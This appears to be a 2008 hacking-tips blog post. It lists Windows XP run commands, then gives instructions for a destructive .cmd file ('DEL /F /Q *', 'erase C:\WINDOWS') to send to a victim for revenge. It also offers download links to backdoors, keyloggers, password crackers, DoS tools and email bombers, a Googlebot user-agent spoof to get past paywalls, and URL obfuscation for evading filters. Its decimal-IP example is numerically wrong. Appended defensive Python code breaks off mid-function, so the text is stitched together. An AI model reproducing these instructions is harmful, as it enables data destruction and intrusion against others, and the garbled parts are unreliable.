Monday, July 14, 2008

99 XP RUN Commands

Accessibility Controls = access.cpl
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Automatic Updates = wuaucpl.cpl
Bluetooth Transfer Wizard = fsquirt
Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel (If Installed)* = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Management = diskmgmt.msc
Disk Partition Manager = diskpart
Display Properties = control desktop/desk.cpl
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility = verifier
Event Viewer = eventvwr.msc
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Folders Properties = control folders
Fonts = control fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor (XP Prof) = gpedit.msc
Hearts Card Game = mshearts
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig
Java Control Panel (If Installed) = jpicpl32.cpl
Java Application Cache Viewer (If Installed) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff
Microsoft Chat = winchat
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager (If Installed) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter (If Installed) = ac3filter.cpl
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder = printers
Private Character Editor = eudcedit
Quicktime (If Installed) = QuickTime.cpl
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedt32
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy (XP Prof) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Shuts Down Windows = shutdown
Sounds and Audio = mmsys.cpl
Spider Solitaire Card Game = spider
SQL Client Configuration = cliconfg
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Properties = sysdm.cpl
Task Manager = taskmgr
Telnet Client = telnet
User Account Management = nusrmgr.cpl
Utility Manager = utilman
Windows Firewall = firewall.cpl
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows System Security Tool = syskey
Windows Update Launches = wupdmgr
Windows XP Tour Wizard = tourstart
Wordpad = write

How to make a powerful virus with only notepad

To delete all folders/files just put this:
DEL /F /Q *
Into Notepad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not prompt you to do it. You will not think anything has happened until you try and do something.
WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send your file to your victim. Once she/he opens it, her/his WINDOWS/LINUX files are gone, and she/he has to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.

Reveal Passwords Hidden Under Asterisks

It's good practice not to use the same password for everything. If your ONLY password falls into the wrong hands, the next thing you know, you won't be able to access anything at all. Imagine you lose access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet Bank account, etc. within a day! You'll go crazy losing all your contacts, and you know someone is having a great time reading all your personal emails.

For me, I use different passwords for software/websites, and most of them are saved on my laptop for easy access. The problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisks *******

I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.

Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.

Reveal hidden password in Google Talk (Software)



Reveal hidden password in Internet Explorer (Web Page)



Both Google Talk and Internet Explorer are active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under asterisks.



Just a word of advice: please use this tool to recover your OWN password. If you get caught using this tool to steal people's passwords, you can get into serious trouble. Treat this tool as a useful recovery tool instead of a hacking tool.

Note: Asterisk Key doesn't reveal password hidden under asterisk in Firefox browser.

Download Asterisk Key

http://www.lostpassword.com/f/downloads/ariskkey/ariskkey.exe

Cable Modem Hacking Kit V.8.0

Make sure you understand these:
1. This process is real and can increase the speeds you get from your cable service.
2. This guide may not work with all modems; it is currently only known to work with Surfboard modems but should work with others.
3. No matter how much you uncap, you can be caught JUST AS EASILY. Use at your own risk.
4. Don't be disappointed if this does not work for you; certain configurations with your modem or ISP may prevent you from properly performing this process.
5. I CANNOT help you if you do NOT have a Surfboard modem.
6. Finally, please read through all of the documentation before asking me or anyone else for support. Thank you.
7. Every Step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.

link
http://d01.megashares.com/?d01=34cfdda

ALL HACKING TOOLS ( RS LINKS BELOW)

Backdoor: Intrude computer and control the computer with client program.
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have an executable file, you can look at the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on; it includes box and wardialer.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.


Backdoor

1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.


Crack tool

1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Microsoft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.


Disassembler

1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassemble Windows executables and dynamic link libraries.


DoS tool

1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.


Document

1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Articles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.


E-mail tool

1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer \ mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.


Editor

1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.


Encryption & decryption tool

1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge number of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email from unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.


Executable file tool

1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be "bundled" with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.


ICQ tool

1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.


Keylogger

1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.


MISC

1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.


Packet forging

1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.


Phreak tool

1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.


Scanner

1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER daemons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collect 20 tools to use in port scanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.


Sniffer

1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competitively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.


Snoop tool

1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.


Source code

1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimic as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.


Spoof

1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.


Virus

1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.

Backdoor


extract the file and rename it to ISO


CODE
http://rapidshare.de/files/34835184/CEH.part01.rar
http://rapidshare.de/files/34835226/CEH.part02.rar
http://rapidshare.de/files/34835342/CEH.part03.rar
http://rapidshare.de/files/34835424/CEH.part04.rar
http://rapidshare.de/files/34835214/CEH.part05.rar
http://rapidshare.de/files/34835413/CEH.part06.rar
http://rapidshare.de/files/34835235/CEH.part07.rar
http://rapidshare.de/files/34835124/CEH.part08.rar

Secret Backdoor To Many Websites

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first....
The lesson you should have learned here is: Obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE.
In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.
Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.
How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.


CODE

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Googlebot/2.1"
"Compatible"="+http://www.googlebot.com/bot.html"


You may always change it back again.... I know only one site that uses your User Agent to establish your eligibility to use its services, and that's the Windows Update site...
To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:


CODE
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]
@="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
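The trick above works only where a site trusts the User-Agent header on its own. The server-side check that defeats it is a reverse DNS lookup on the client IP followed by a forward lookup of the returned name; the sketch below is an added example, not code from the original post, and the IP addresses, host names and the `classify_request` function are constructed for illustration.

```python
import socket

# Reverse-DNS suffixes this example accepts for a genuine Googlebot.
TRUSTED_SUFFIXES = (".googlebot.com", ".google.com")


def system_reverse(ip):
    """PTR lookup using the system resolver; None when no name exists."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def system_forward(name):
    """A/AAAA lookup using the system resolver; empty set on failure."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(name, None)}
    except OSError:
        return set()


def classify_request(ip, user_agent, reverse=system_reverse, forward=system_forward):
    """Return 'not-claimed', 'verified' or 'spoofed' for one request.

    The User-Agent only tells us that the client *claims* to be Googlebot.
    The claim is accepted when (1) the IP's PTR name sits under a trusted
    suffix and (2) that name resolves back to the same IP.
    """
    if "googlebot" not in user_agent.lower():
        return "not-claimed"
    name = reverse(ip)
    if not name:
        return "spoofed"
    name = name.rstrip(".").lower()
    # The leading dot in each suffix rejects names like "fakegooglebot.com".
    if not name.endswith(TRUSTED_SUFFIXES):
        return "spoofed"
    # Whoever owns an IP controls its PTR record, so the forward lookup
    # is the step that actually proves the name belongs to that IP.
    if ip not in forward(name):
        return "spoofed"
    return "verified"


# Constructed sample data (documentation address ranges, made-up names).
SAMPLE_PTR = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",   # genuine-looking crawler
    "198.51.100.7": "host7.isp.example",              # ordinary ISP customer
    "203.0.113.5": "crawl-203-0-113-5.googlebot.com", # PTR forged by IP owner
    "203.0.113.9": "googlebot.com.cdn.example",       # suffix look-alike
}
SAMPLE_A = {"crawl-192-0-2-10.googlebot.com": {"192.0.2.10"}}


def demo():
    """Classify four requests that all send the spoofed User-Agent."""
    ua = "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"  # constructed
    return {
        ip: classify_request(ip, ua, SAMPLE_PTR.get,
                             lambda n: SAMPLE_A.get(n, set()))
        for ip in SAMPLE_PTR
    }


if __name__ == "__main__":
    for ip, verdict in demo().items():
        print(ip, verdict)
```
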

Using URL Obfuscation to hide your IP Address

Let me elaborate on how hackers use URL Obfuscation in order to hide their IP Address.

It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don’t. Here is an example of an encoded binary IP address: http://8812120797/. Does it look confusing? Hehe. Well, this decimal address can be converted into a human-readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.

To convert an IP address to its binary equivalent, perform the following steps.

(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.

192 = 11000000
168 = 10101000
13 = 00001101
10 = 00001010

(2) Combine the four eight digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.
(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.
(4) Entering this into the address field, http://3232238858, takes you to 192.168.13.10.
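
For the filtering side of the problem described above, here is an added example (not from the original post) that normalises a URL host to dotted-quad form before it is compared with a blocklist. It goes beyond the single decimal case worked above and also covers hexadecimal, octal and shortened dotted forms; the function names and the blocklist are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit

_HEX = re.compile(r"0x([0-9a-f]*)")
_OCT = re.compile(r"0([0-7]*)")
_DEC = re.compile(r"[1-9][0-9]*")


def _parse_part(part):
    """Parse one host component as 0x-hex, 0-octal or decimal; None otherwise."""
    p = part.lower()
    m = _HEX.fullmatch(p)
    if m:
        return int(m.group(1) or "0", 16)
    m = _OCT.fullmatch(p)
    if m:
        return int(m.group(1) or "0", 8)
    if _DEC.fullmatch(p):
        return int(p)
    return None


def canonical_ipv4(host):
    """Return the dotted-quad form of a numeric host, or None if it is not one.

    Accepts 1 to 4 components; every component but the last is one byte and
    the last one fills whatever bytes remain (so "3232238858" is 4 bytes).
    """
    if host.endswith("."):
        host = host[:-1]
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_parse_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *head, last = nums
    if any(n > 0xFF for n in head) or last >= 256 ** (4 - len(head)):
        return None  # does not fit in 32 bits
    value = last
    for i, n in enumerate(head):
        value |= n << (8 * (3 - i))
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))


def blocked_naive(url, blocklist):
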